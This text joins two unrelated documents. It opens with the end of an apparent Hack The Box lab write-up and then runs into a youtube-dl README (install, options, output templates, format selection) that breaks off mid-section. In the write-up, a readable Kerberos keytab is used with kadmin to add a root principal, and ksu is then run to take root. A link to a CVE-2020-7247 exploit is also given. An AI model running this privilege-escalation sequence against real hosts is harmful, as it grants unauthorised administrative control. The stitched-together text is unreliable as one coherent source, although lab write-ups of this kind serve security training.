- What is a [`keytab`](https://kb.iu.edu/d/aumh) file?
>A keytab is a file containing pairs of Kerberos principals and encrypted keys (which are derived from the Kerberos password). You can use a keytab file to authenticate to various remote systems using Kerberos without entering a password. __Anyone with read permission on a keytab file can use all the keys in the file.__
```bash
[admin@srv01 ~]$ ls -l /etc/krb5.keytab
-rw-r-----. 1 root admin 1403 Dec 19 06:10 /etc/krb5.keytab
```
You see dear `r` letter at the 5th place which stands for __our read permission__'s existence?
Let's see the principals inside `/etc/krb5.keytab`
```bash
[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
[admin@srv01 ~]$
```
There are `kadmin/admin@REALCORP.HTB` principals, nice!
Now the only thing to do is using [`kadmin`](https://web.mit.edu/kerberos/krb5-1.12/doc/admin/admin_commands/kadmin_local.html) (Kerberos V5 administration system) to add a `root@REALCORP.HTB` principal which we can use with [`ksu`](https://web.mit.edu/kerberos/krb5-latest/doc/user/user_commands/ksu.html) (Kerberized version of the su program) to authenticate as `root` afterwards...
```bash
[admin@srv01 ~]$
kadmin -r REALCORP.HTB -p kadmin/admin@REALCORP.HTB -k -t /etc/krb5.keytab
add_principal root@REALCORP.HTB
<Enter a password 2 times>
exit
ksu root
<Enter the same password>
```
![](src/root.png)
And we finally R00Ted the machine....
![](/src/gifs/pwned.gif)
---
# Closing
If you liked my writeup, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and __+respecting__ my profile in HTB.
<a href="https://app.hackthebox.eu/profile/184235">
<img src="https://www.hackthebox.eu/badge/image/184235" alt="f4T1H">
</img>
</a>
<br>
<a href="https://www.buymeacoffee.com/f4T1H21">
<img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support">
</img>
</a>
# Resources
|`CNAME record`|https://en.wikipedia.org/wiki/CNAME_record|
|:-|:-|
|__`Proxychains`__|__https://www.youtube.com/watch?v=NN9fQwiomAU__|
|__`WPAD protocol`__|__https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol__|
|__`CVE 2020-7247`__|__https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt__|
|__`CVE 2020-7247 PoC exploit`__|__https://github.com/f4T1H21/CVE-2020-7247__|
|__`.k5login file`__|__https://web.mit.edu/kerberos/krb5-1.5/krb5-1.5.4/doc/krb5-user/Granting-Access-to-Your-Account.html__|
|__`keytab file`__|__https://kb.iu.edu/d/aumh__|
|__`Kerberos administration program`__|__https://web.mit.edu/kerberos/krb5-1.12/doc/admin/admin_commands/kadmin_local.html__|
|__`Kerberized su`__|__https://web.mit.edu/kerberos/krb5-latest/doc/user/user_commands/ksu.html__|
<br>
___-Written by f4T1H-___
|
[![Build Status](https://travis-ci.org/ytdl-org/youtube-dl.svg?branch=master)](https://travis-ci.org/ytdl-org/youtube-dl)
youtube-dl - download videos from youtube.com or other video platforms
- [INSTALLATION](#installation)
- [DESCRIPTION](#description)
- [OPTIONS](#options)
- [CONFIGURATION](#configuration)
- [OUTPUT TEMPLATE](#output-template)
- [FORMAT SELECTION](#format-selection)
- [VIDEO SELECTION](#video-selection)
- [FAQ](#faq)
- [DEVELOPER INSTRUCTIONS](#developer-instructions)
- [EMBEDDING YOUTUBE-DL](#embedding-youtube-dl)
- [BUGS](#bugs)
- [COPYRIGHT](#copyright)
# INSTALLATION
To install it right away for all UNIX users (Linux, macOS, etc.), type:
sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl
sudo chmod a+rx /usr/local/bin/youtube-dl
If you do not have curl, you can alternatively use a recent wget:
sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl
sudo chmod a+rx /usr/local/bin/youtube-dl
Windows users can [download an .exe file](https://yt-dl.org/latest/youtube-dl.exe) and place it in any location on their [PATH](https://en.wikipedia.org/wiki/PATH_%28variable%29) except for `%SYSTEMROOT%\System32` (e.g. **do not** put in `C:\Windows\System32`).
You can also use pip:
sudo -H pip install --upgrade youtube-dl
This command will update youtube-dl if you have already installed it. See the [pypi page](https://pypi.python.org/pypi/youtube_dl) for more information.
macOS users can install youtube-dl with [Homebrew](https://brew.sh/):
brew install youtube-dl
Or with [MacPorts](https://www.macports.org/):
sudo port install youtube-dl
Alternatively, refer to the [developer instructions](#developer-instructions) for how to check out and work with the git repository. For further options, including PGP signatures, see the [youtube-dl Download Page](https://ytdl-org.github.io/youtube-dl/download.html).
# DESCRIPTION
**youtube-dl** is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on macOS. It is released to the public domain, which means you can modify it, redistribute it or use it however you like.
youtube-dl [OPTIONS] URL [URL...]
# OPTIONS
-h, --help Print this help text and exit
--version Print program version and exit
-U, --update Update this program to latest version. Make
sure that you have sufficient permissions
(run with sudo if needed)
-i, --ignore-errors Continue on download errors, for example to
skip unavailable videos in a playlist
--abort-on-error Abort downloading of further videos (in the
playlist or the command line) if an error
occurs
--dump-user-agent Display the current browser identification
--list-extractors List all supported extractors
--extractor-descriptions Output descriptions of all supported
extractors
--force-generic-extractor Force extraction to use the generic
extractor
--default-search PREFIX Use this prefix for unqualified URLs. For
example "gvsearch2:" downloads two videos
from google videos for youtube-dl "large
apple". Use the value "auto" to let
youtube-dl guess ("auto_warning" to emit a
warning when guessing). "error" just throws
an error. The default value "fixup_error"
repairs broken URLs, but emits an error if
this is not possible instead of searching.
--ignore-config Do not read configuration files. When given
in the global configuration file
/etc/youtube-dl.conf: Do not read the user
configuration in ~/.config/youtube-
dl/config (%APPDATA%/youtube-dl/config.txt
on Windows)
--config-location PATH Location of the configuration file; either
the path to the config or its containing
directory.
--flat-playlist Do not extract the videos of a playlist,
only list them.
--mark-watched Mark videos watched (YouTube only)
--no-mark-watched Do not mark videos watched (YouTube only)
--no-color Do not emit color codes in output
## Network Options:
--proxy URL Use the specified HTTP/HTTPS/SOCKS proxy.
To enable SOCKS proxy, specify a proper
scheme. For example
socks5://127.0.0.1:1080/. Pass in an empty
string (--proxy "") for direct connection
--socket-timeout SECONDS Time to wait before giving up, in seconds
--source-address IP Client-side IP address to bind to
-4, --force-ipv4 Make all connections via IPv4
-6, --force-ipv6 Make all connections via IPv6
## Geo Restriction:
--geo-verification-proxy URL Use this proxy to verify the IP address for
some geo-restricted sites. The default
proxy specified by --proxy (or none, if the
option is not present) is used for the
actual downloading.
--geo-bypass Bypass geographic restriction via faking
X-Forwarded-For HTTP header
--no-geo-bypass Do not bypass geographic restriction via
faking X-Forwarded-For HTTP header
--geo-bypass-country CODE Force bypass geographic restriction with
explicitly provided two-letter ISO 3166-2
country code
--geo-bypass-ip-block IP_BLOCK Force bypass geographic restriction with
explicitly provided IP block in CIDR
notation
## Video Selection:
--playlist-start NUMBER Playlist video to start at (default is 1)
--playlist-end NUMBER Playlist video to end at (default is last)
--playlist-items ITEM_SPEC Playlist video items to download. Specify
indices of the videos in the playlist
separated by commas like: "--playlist-items
1,2,5,8" if you want to download videos
indexed 1, 2, 5, 8 in the playlist. You can
specify range: "--playlist-items
1-3,7,10-13", it will download the videos
at index 1, 2, 3, 7, 10, 11, 12 and 13.
--match-title REGEX Download only matching titles (regex or
caseless sub-string)
--reject-title REGEX Skip download for matching titles (regex or
caseless sub-string)
--max-downloads NUMBER Abort after downloading NUMBER files
--min-filesize SIZE Do not download any videos smaller than
SIZE (e.g. 50k or 44.6m)
--max-filesize SIZE Do not download any videos larger than SIZE
(e.g. 50k or 44.6m)
--date DATE Download only videos uploaded in this date
--datebefore DATE Download only videos uploaded on or before
this date (i.e. inclusive)
--dateafter DATE Download only videos uploaded on or after
this date (i.e. inclusive)
--min-views COUNT Do not download any videos with less than
COUNT views
--max-views COUNT Do not download any videos with more than
COUNT views
--match-filter FILTER Generic video filter. Specify any key (see
the "OUTPUT TEMPLATE" for a list of
available keys) to match if the key is
present, !key to check if the key is not
present, key > NUMBER (like "comment_count
> 12", also works with >=, <, <=, !=, =) to
compare against a number, key = 'LITERAL'
(like "uploader = 'Mike Smith'", also works
with !=) to match against a string literal
and & to require multiple matches. Values
which are not known are excluded unless you
put a question mark (?) after the operator.
For example, to only match videos that have
been liked more than 100 times and disliked
less than 50 times (or the dislike
functionality is not available at the given
service), but who also have a description,
use --match-filter "like_count > 100 &
dislike_count <? 50 & description" .
--no-playlist Download only the video, if the URL refers
to a video and a playlist.
--yes-playlist Download the playlist, if the URL refers to
a video and a playlist.
--age-limit YEARS Download only videos suitable for the given
age
--download-archive FILE Download only videos not listed in the
archive file. Record the IDs of all
downloaded videos in it.
--include-ads Download advertisements as well
(experimental)
## Download Options:
-r, --limit-rate RATE Maximum download rate in bytes per second
(e.g. 50K or 4.2M)
-R, --retries RETRIES Number of retries (default is 10), or
"infinite".
--fragment-retries RETRIES Number of retries for a fragment (default
is 10), or "infinite" (DASH, hlsnative and
ISM)
--skip-unavailable-fragments Skip unavailable fragments (DASH, hlsnative
and ISM)
--abort-on-unavailable-fragment Abort downloading when some fragment is not
available
--keep-fragments Keep downloaded fragments on disk after
downloading is finished; fragments are
erased by default
--buffer-size SIZE Size of download buffer (e.g. 1024 or 16K)
(default is 1024)
--no-resize-buffer Do not automatically adjust the buffer
size. By default, the buffer size is
automatically resized from an initial value
of SIZE.
--http-chunk-size SIZE Size of a chunk for chunk-based HTTP
downloading (e.g. 10485760 or 10M) (default
is disabled). May be useful for bypassing
bandwidth throttling imposed by a webserver
(experimental)
--playlist-reverse Download playlist videos in reverse order
--playlist-random Download playlist videos in random order
--xattr-set-filesize Set file xattribute ytdl.filesize with
expected file size
--hls-prefer-native Use the native HLS downloader instead of
ffmpeg
--hls-prefer-ffmpeg Use ffmpeg instead of the native HLS
downloader
--hls-use-mpegts Use the mpegts container for HLS videos,
allowing to play the video while
downloading (some players may not be able
to play it)
--external-downloader COMMAND Use the specified external downloader.
Currently supports
aria2c,avconv,axel,curl,ffmpeg,httpie,wget
--external-downloader-args ARGS Give these arguments to the external
downloader
## Filesystem Options:
-a, --batch-file FILE File containing URLs to download ('-' for
stdin), one URL per line. Lines starting
with '#', ';' or ']' are considered as
comments and ignored.
--id Use only video ID in file name
-o, --output TEMPLATE Output filename template, see the "OUTPUT
TEMPLATE" for all the info
--autonumber-start NUMBER Specify the start value for %(autonumber)s
(default is 1)
--restrict-filenames Restrict filenames to only ASCII
characters, and avoid "&" and spaces in
filenames
-w, --no-overwrites Do not overwrite files
-c, --continue Force resume of partially downloaded files.
By default, youtube-dl will resume
downloads if possible.
--no-continue Do not resume partially downloaded files
(restart from beginning)
--no-part Do not use .part files - write directly
into output file
--no-mtime Do not use the Last-modified header to set
the file modification time
--write-description Write video description to a .description
file
--write-info-json Write video metadata to a .info.json file
--write-annotations Write video annotations to a
.annotations.xml file
--load-info-json FILE JSON file containing the video information
(created with the "--write-info-json"
option)
--cookies FILE File to read cookies from and dump cookie
jar in
--cache-dir DIR Location in the filesystem where youtube-dl
can store some downloaded information
permanently. By default
$XDG_CACHE_HOME/youtube-dl or
~/.cache/youtube-dl . At the moment, only
YouTube player files (for videos with
obfuscated signatures) are cached, but that
may change.
--no-cache-dir Disable filesystem caching
--rm-cache-dir Delete all filesystem cache files
## Thumbnail images:
--write-thumbnail Write thumbnail image to disk
--write-all-thumbnails Write all thumbnail image formats to disk
--list-thumbnails Simulate and list all available thumbnail
formats
## Verbosity / Simulation Options:
-q, --quiet Activate quiet mode
--no-warnings Ignore warnings
-s, --simulate Do not download the video and do not write
anything to disk
--skip-download Do not download the video
-g, --get-url Simulate, quiet but print URL
-e, --get-title Simulate, quiet but print title
--get-id Simulate, quiet but print id
--get-thumbnail Simulate, quiet but print thumbnail URL
--get-description Simulate, quiet but print video description
--get-duration Simulate, quiet but print video length
--get-filename Simulate, quiet but print output filename
--get-format Simulate, quiet but print output format
-j, --dump-json Simulate, quiet but print JSON information.
See the "OUTPUT TEMPLATE" for a description
of available keys.
-J, --dump-single-json Simulate, quiet but print JSON information
for each command-line argument. If the URL
refers to a playlist, dump the whole
playlist information in a single line.
--print-json Be quiet and print the video information as
JSON (video is still being downloaded).
--newline Output progress bar as new lines
--no-progress Do not print progress bar
--console-title Display progress in console titlebar
-v, --verbose Print various debugging information
--dump-pages Print downloaded pages encoded using base64
to debug problems (very verbose)
--write-pages Write downloaded intermediary pages to
files in the current directory to debug
problems
--print-traffic Display sent and read HTTP traffic
-C, --call-home Contact the youtube-dl server for debugging
--no-call-home Do NOT contact the youtube-dl server for
debugging
## Workarounds:
--encoding ENCODING Force the specified encoding (experimental)
--no-check-certificate Suppress HTTPS certificate validation
--prefer-insecure Use an unencrypted connection to retrieve
information about the video. (Currently
supported only for YouTube)
--user-agent UA Specify a custom user agent
--referer URL Specify a custom referer, use if the video
access is restricted to one domain
--add-header FIELD:VALUE Specify a custom HTTP header and its value,
separated by a colon ':'. You can use this
option multiple times
--bidi-workaround Work around terminals that lack
bidirectional text support. Requires bidiv
or fribidi executable in PATH
--sleep-interval SECONDS Number of seconds to sleep before each
download when used alone or a lower bound
of a range for randomized sleep before each
download (minimum possible number of
seconds to sleep) when used along with
--max-sleep-interval.
--max-sleep-interval SECONDS Upper bound of a range for randomized sleep
before each download (maximum possible
number of seconds to sleep). Must only be
used along with --min-sleep-interval.
## Video Format Options:
-f, --format FORMAT Video format code, see the "FORMAT
SELECTION" for all the info
--all-formats Download all available video formats
--prefer-free-formats Prefer free video formats unless a specific
one is requested
-F, --list-formats List all available formats of requested
videos
--youtube-skip-dash-manifest Do not download the DASH manifests and
related data on YouTube videos
--merge-output-format FORMAT If a merge is required (e.g.
bestvideo+bestaudio), output to given
container format. One of mkv, mp4, ogg,
webm, flv. Ignored if no merge is required
## Subtitle Options:
--write-sub Write subtitle file
--write-auto-sub Write automatically generated subtitle file
(YouTube only)
--all-subs Download all the available subtitles of the
video
--list-subs List all available subtitles for the video
--sub-format FORMAT Subtitle format, accepts formats
preference, for example: "srt" or
"ass/srt/best"
--sub-lang LANGS Languages of the subtitles to download
(optional) separated by commas, use --list-
subs for available language tags
## Authentication Options:
-u, --username USERNAME Login with this account ID
-p, --password PASSWORD Account password. If this option is left
out, youtube-dl will ask interactively.
-2, --twofactor TWOFACTOR Two-factor authentication code
-n, --netrc Use .netrc authentication data
--video-password PASSWORD Video password (vimeo, smotri, youku)
## Adobe Pass Options:
--ap-mso MSO Adobe Pass multiple-system operator (TV
provider) identifier, use --ap-list-mso for
a list of available MSOs
--ap-username USERNAME Multiple-system operator account login
--ap-password PASSWORD Multiple-system operator account password.
If this option is left out, youtube-dl will
ask interactively.
--ap-list-mso List all supported multiple-system
operators
## Post-processing Options:
-x, --extract-audio Convert video files to audio-only files
(requires ffmpeg or avconv and ffprobe or
avprobe)
--audio-format FORMAT Specify audio format: "best", "aac",
"flac", "mp3", "m4a", "opus", "vorbis", or
"wav"; "best" by default; No effect without
-x
--audio-quality QUALITY Specify ffmpeg/avconv audio quality, insert
a value between 0 (better) and 9 (worse)
for VBR or a specific bitrate like 128K
(default 5)
--recode-video FORMAT Encode the video to another format if
necessary (currently supported:
mp4|flv|ogg|webm|mkv|avi)
--postprocessor-args ARGS Give these arguments to the postprocessor
-k, --keep-video Keep the video file on disk after the post-
processing; the video is erased by default
--no-post-overwrites Do not overwrite post-processed files; the
post-processed files are overwritten by
default
--embed-subs Embed subtitles in the video (only for mp4,
webm and mkv videos)
--embed-thumbnail Embed thumbnail in the audio as cover art
--add-metadata Write metadata to the video file
--metadata-from-title FORMAT Parse additional metadata like song title /
artist from the video title. The format
syntax is the same as --output. Regular
expression with named capture groups may
also be used. The parsed parameters replace
existing values. Example: --metadata-from-
title "%(artist)s - %(title)s" matches a
title like "Coldplay - Paradise". Example
(regex): --metadata-from-title
"(?P<artist>.+?) - (?P<title>.+)"
--xattrs Write metadata to the video file's xattrs
(using dublin core and xdg standards)
--fixup POLICY Automatically correct known faults of the
file. One of never (do nothing), warn (only
emit a warning), detect_or_warn (the
default; fix file if we can, warn
otherwise)
--prefer-avconv Prefer avconv over ffmpeg for running the
postprocessors
--prefer-ffmpeg Prefer ffmpeg over avconv for running the
postprocessors (default)
--ffmpeg-location PATH Location of the ffmpeg/avconv binary;
either the path to the binary or its
containing directory.
--exec CMD Execute a command on the file after
downloading, similar to find's -exec
syntax. Example: --exec 'adb push {}
/sdcard/Music/ && rm {}'
--convert-subs FORMAT Convert the subtitles to other format
(currently supported: srt|ass|vtt|lrc)
# CONFIGURATION
You can configure youtube-dl by placing any supported command line option to a configuration file. On Linux and macOS, the system wide configuration file is located at `/etc/youtube-dl.conf` and the user wide configuration file at `~/.config/youtube-dl/config`. On Windows, the user wide configuration file locations are `%APPDATA%\youtube-dl\config.txt` or `C:\Users\<user name>\youtube-dl.conf`. Note that by default configuration file may not exist so you may need to create it yourself.
For example, with the following configuration file youtube-dl will always extract the audio, not copy the mtime, use a proxy and save all videos under `Movies` directory in your home directory:
```
# Lines starting with # are comments
# Always extract audio
-x
# Do not copy the mtime
--no-mtime
# Use this proxy
--proxy 127.0.0.1:3128
# Save all videos under Movies directory in your home directory
-o ~/Movies/%(title)s.%(ext)s
```
Note that options in configuration file are just the same options aka switches used in regular command line calls thus there **must be no whitespace** after `-` or `--`, e.g. `-o` or `--proxy` but not `- o` or `-- proxy`.
You can use `--ignore-config` if you want to disable the configuration file for a particular youtube-dl run.
You can also use `--config-location` if you want to use custom configuration file for a particular youtube-dl run.
### Authentication with `.netrc` file
You may also want to configure automatic credentials storage for extractors that support authentication (by providing login and password with `--username` and `--password`) in order not to pass credentials as command line arguments on every youtube-dl execution and prevent tracking plain text passwords in the shell command history. You can achieve this using a [`.netrc` file](https://stackoverflow.com/tags/.netrc/info) on a per extractor basis. For that you will need to create a `.netrc` file in your `$HOME` and restrict permissions to read/write by only you:
```
touch $HOME/.netrc
chmod a-rwx,u+rw $HOME/.netrc
```
After that you can add credentials for an extractor in the following format, where *extractor* is the name of the extractor in lowercase:
```
machine <extractor> login <login> password <password>
```
For example:
```
machine youtube login myaccount@gmail.com password my_youtube_password
machine twitch login my_twitch_account_name password my_twitch_password
```
To activate authentication with the `.netrc` file you should pass `--netrc` to youtube-dl or place it in the [configuration file](#configuration).
On Windows you may also need to setup the `%HOME%` environment variable manually. For example:
```
set HOME=%USERPROFILE%
```
# OUTPUT TEMPLATE
The `-o` option allows users to indicate a template for the output file names.
**tl;dr:** [navigate me to examples](#output-template-examples).
The basic usage is not to set any template arguments when downloading a single file, like in `youtube-dl -o funny_video.flv "https://some/video"`. However, it may contain special sequences that will be replaced when downloading each video. The special sequences may be formatted according to [python string formatting operations](https://docs.python.org/2/library/stdtypes.html#string-formatting). For example, `%(NAME)s` or `%(NAME)05d`. To clarify, that is a percent symbol followed by a name in parentheses, followed by formatting operations. Allowed names along with sequence type are:
- `id` (string): Video identifier
- `title` (string): Video title
- `url` (string): Video URL
- `ext` (string): Video filename extension
- `alt_title` (string): A secondary title of the video
- `display_id` (string): An alternative identifier for the video
- `uploader` (string): Full name of the video uploader
- `license` (string): License name the video is licensed under
- `creator` (string): The creator of the video
- `release_date` (string): The date (YYYYMMDD) when the video was released
- `timestamp` (numeric): UNIX timestamp of the moment the video became available
- `upload_date` (string): Video upload date (YYYYMMDD)
- `uploader_id` (string): Nickname or id of the video uploader
- `channel` (string): Full name of the channel the video is uploaded on
- `channel_id` (string): Id of the channel
- `location` (string): Physical location where the video was filmed
- `duration` (numeric): Length of the video in seconds
- `view_count` (numeric): How many users have watched the video on the platform
- `like_count` (numeric): Number of positive ratings of the video
- `dislike_count` (numeric): Number of negative ratings of the video
- `repost_count` (numeric): Number of reposts of the video
- `average_rating` (numeric): Average rating give by users, the scale used depends on the webpage
- `comment_count` (numeric): Number of comments on the video
- `age_limit` (numeric): Age restriction for the video (years)
- `is_live` (boolean): Whether this video is a live stream or a fixed-length video
- `start_time` (numeric): Time in seconds where the reproduction should start, as specified in the URL
- `end_time` (numeric): Time in seconds where the reproduction should end, as specified in the URL
- `format` (string): A human-readable description of the format
- `format_id` (string): Format code specified by `--format`
- `format_note` (string): Additional info about the format
- `width` (numeric): Width of the video
- `height` (numeric): Height of the video
- `resolution` (string): Textual description of width and height
- `tbr` (numeric): Average bitrate of audio and video in KBit/s
- `abr` (numeric): Average audio bitrate in KBit/s
- `acodec` (string): Name of the audio codec in use
- `asr` (numeric): Audio sampling rate in Hertz
- `vbr` (numeric): Average video bitrate in KBit/s
- `fps` (numeric): Frame rate
- `vcodec` (string): Name of the video codec in use
- `container` (string): Name of the container format
- `filesize` (numeric): The number of bytes, if known in advance
- `filesize_approx` (numeric): An estimate for the number of bytes
- `protocol` (string): The protocol that will be used for the actual download
- `extractor` (string): Name of the extractor
- `extractor_key` (string): Key name of the extractor
- `epoch` (numeric): Unix epoch when creating the file
- `autonumber` (numeric): Five-digit number that will be increased with each download, starting at zero
- `playlist` (string): Name or id of the playlist that contains the video
- `playlist_index` (numeric): Index of the video in the playlist padded with leading zeros according to the total length of the playlist
- `playlist_id` (string): Playlist identifier
- `playlist_title` (string): Playlist title
- `playlist_uploader` (string): Full name of the playlist uploader
- `playlist_uploader_id` (string): Nickname or id of the playlist uploader
Available for the video that belongs to some logical chapter or section:
- `chapter` (string): Name or title of the chapter the video belongs to
- `chapter_number` (numeric): Number of the chapter the video belongs to
- `chapter_id` (string): Id of the chapter the video belongs to
Available for the video that is an episode of some series or programme:
- `series` (string): Title of the series or programme the video episode belongs to
- `season` (string): Title of the season the video episode belongs to
- `season_number` (numeric): Number of the season the video episode belongs to
- `season_id` (string): Id of the season the video episode belongs to
- `episode` (string): Title of the video episode
- `episode_number` (numeric): Number of the video episode within a season
- `episode_id` (string): Id of the video episode
Available for the media that is a track or a part of a music album:
- `track` (string): Title of the track
- `track_number` (numeric): Number of the track within an album or a disc
- `track_id` (string): Id of the track
- `artist` (string): Artist(s) of the track
- `genre` (string): Genre(s) of the track
- `album` (string): Title of the album the track belongs to
- `album_type` (string): Type of the album
- `album_artist` (string): List of all artists appeared on the album
- `disc_number` (numeric): Number of the disc or other physical medium the track belongs to
- `release_year` (numeric): Year (YYYY) when the album was released
Each aforementioned sequence when referenced in an output template will be replaced by the actual value corresponding to the sequence name. Note that some of the sequences are not guaranteed to be present since they depend on the metadata obtained by a particular extractor. Such sequences will be replaced with `NA`.
For example for `-o %(title)s-%(id)s.%(ext)s` and an mp4 video with title `youtube-dl test video` and id `BaW_jenozKcj`, this will result in a `youtube-dl test video-BaW_jenozKcj.mp4` file created in the current directory.
For numeric sequences you can use numeric related formatting, for example, `%(view_count)05d` will result in a string with view count padded with zeros up to 5 characters, like in `00042`.
Output templates can also contain arbitrary hierarchical path, e.g. `-o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s'` which will result in downloading each video in a directory corresponding to this path template. Any missing directory will be automatically created for you.
To use percent literals in an output template use `%%`. To output to stdout use `-o -`.
The current default template is `%(title)s-%(id)s.%(ext)s`.
In some cases, you don't want special characters such as 中, spaces, or &, such as when transferring the downloaded filename to a Windows system or the filename through an 8bit-unsafe channel. In these cases, add the `--restrict-filenames` flag to get a shorter title:
#### Output template and Windows batch files
If you are using an output template inside a Windows batch file then you must escape plain percent characters (`%`) by doubling, so that `-o "%(title)s-%(id)s.%(ext)s"` should become `-o "%%(title)s-%%(id)s.%%(ext)s"`. However you should not touch `%`'s that are not plain characters, e.g. environment variables for expansion should stay intact: `-o "C:\%HOMEPATH%\Desktop\%%(title)s.%%(ext)s"`.
#### Output template examples
Note that on Windows you may need to use double quotes instead of single.
```bash
$ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc
youtube-dl test video ''_ä↭𝕐.mp4 # All kinds of weird characters
$ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc --restrict-filenames
youtube-dl_test_video_.mp4 # A simple file name
# Download YouTube playlist videos in separate directory indexed by video order in a playlist
$ youtube-dl -o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re
# Download all playlists of YouTube channel/user keeping each playlist in separate directory:
$ youtube-dl -o '%(uploader)s/%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/user/TheLinuxFoundation/playlists
# Download Udemy course keeping each chapter in separate directory under MyVideos directory in your home
$ youtube-dl -u user -p password -o '~/MyVideos/%(playlist)s/%(chapter_number)s - %(chapter)s/%(title)s.%(ext)s' https://www.udemy.com/java-tutorial/
# Download entire series season keeping each series and each season in separate directory under C:/MyVideos
$ youtube-dl -o "C:/MyVideos/%(series)s/%(season_number)s - %(season)s/%(episode_number)s - %(episode)s.%(ext)s" https://videomore.ru/kino_v_detalayah/5_sezon/367617
# Stream the video being downloaded to stdout
$ youtube-dl -o - BaW_jenozKc
```
# FORMAT SELECTION
By default youtube-dl tries to download the best available quality, i.e. if you want the best quality you **don't need** to pass any special options, youtube-dl will guess it for you by **default**.
But sometimes you may want to download in a different format, for example when you are on a slow or intermittent connection. The key mechanism for achieving this is so-called *format selection* based on which you can explicitly specify desired format, select formats based on some criterion or criteria, setup precedence and much more.
The general syntax for format selection is `--format FORMAT` or shorter `-f FORMAT` where `FORMAT` is a *selector expression*, i.e. an expression that describes format or formats you would like to download.
**tl;dr:** [navigate me to examples](#format-selection-examples).
The simplest case is requesting a specific format, for example with `-f 22` you can download the format with format code equal to 22. You can get the list of available format codes for particular video using `--list-formats` or `-F`. Note that these format codes are extractor specific.
You can also use a file extension (currently `3gp`, `aac`, `flv`, `m4a`, `mp3`, `mp4`, `ogg`, `wav`, `webm` are supported) to download the best quality format of a particular file extension served as a single file, e.g. `-f webm` will download the best quality format with the `webm` extension served as a single file.
You can also use special names to select particular edge case formats:
- `best`: Select the best quality format represented by a single file with video and audio.
- `worst`: Select the worst quality format represented by a single file with video and audio.
- `bestvideo`: Select the best quality video-only format (e.g. DASH video). May not be available.
- `worstvideo`: Select the worst quality video-only format. May not be available.
- `bestaudio`: Select the best quality audio only-format. May not be available.
- `worstaudio`: Select the worst quality audio only-format. May not be available.
For example, to download the worst quality video-only format you can use `-f worstvideo`.
If you want to download multiple videos and they don't have the same formats available, you can specify the order of preference using slashes. Note that slash is left-associative, i.e. formats on the left hand side are preferred, for example `-f 22/17/18` will download format 22 if it's available, otherwise it will download format 17 if it's available, otherwise it will download format 18 if it's available, otherwise it will complain that no suitable formats are available for download.
If you want to download several formats of the same video use a comma as a separator, e.g. `-f 22,17,18` will download all these three formats, of course if they are available. Or a more sophisticated example combined with the precedence feature: `-f 136/137/mp4/bestvideo,140/m4a/bestaudio`.
You can also filter the video formats by putting a condition in brackets, as in `-f "best[height=720]"` (or `-f "[filesize>10M]"`).
The following numeric meta fields can be used with comparisons `<`, `<=`, `>`, `>=`, `=` (equals), `!=` (not equals):
- `filesize`: The number of bytes, if known in advance
- `width`: Width of the video, if known
- `height`: Height of the video, if known
- `tbr`: Average bitrate of audio and video in KBit/s
- `abr`: Average audio bitrate in KBit/s
- `vbr`: Average video bitrate in KBit/s
- `asr`: Audio sampling rate in Hertz
- `fps`: Frame rate
Also filtering work for comparisons `=` (equals), `^=` (starts with), `$=` (ends with), `*=` (contains) and following string meta fields:
- `ext`: File extension
- `acodec`: Name of the audio codec in use
- `vcodec`: Name of the video codec in use
- `container`: Name of the container format
- `protocol`: The protocol that will be used for the actual download, lower-case (`http`, `https`, `rtsp`, `rtmp`, `rtmpe`, `mms`, `f4m`, `ism`, `http_dash_segments`, `m3u8`, or `m3u8_native`)
- `format_id`: A short description of the format
Any string comparison may be prefixed with negation `!` in order to produce an opposite comparison, e.g. `!*=` (does not contain).
Note that none of the aforementioned meta fields are guaranteed to be present since this solely depends on the metadata obtained by particular extractor, i.e. the metadata offered by the video hoster.
Formats for which the value is not known are excluded unless you put a question mark (`?`) after the operator. You can combine format filters, so `-f "[height <=? 720][tbr>500]"` selects up to 720p videos (or videos where the height is not known) with a bitrate of at least 500 KBit/s.
You can merge the video and audio of two formats into a single file using `-f <video-format>+<audio-format>` (requires ffmpeg or avconv installed), for example `-f bestvideo+bestaudio` will download the best video-only format, the best audio-only format and mux them together with ffmpeg/avconv.
Format selectors can also be grouped using parentheses, for example if you want to download the best mp4 and webm formats with a height lower than 480 you can use `-f '(mp4,webm)[height<480]'`.
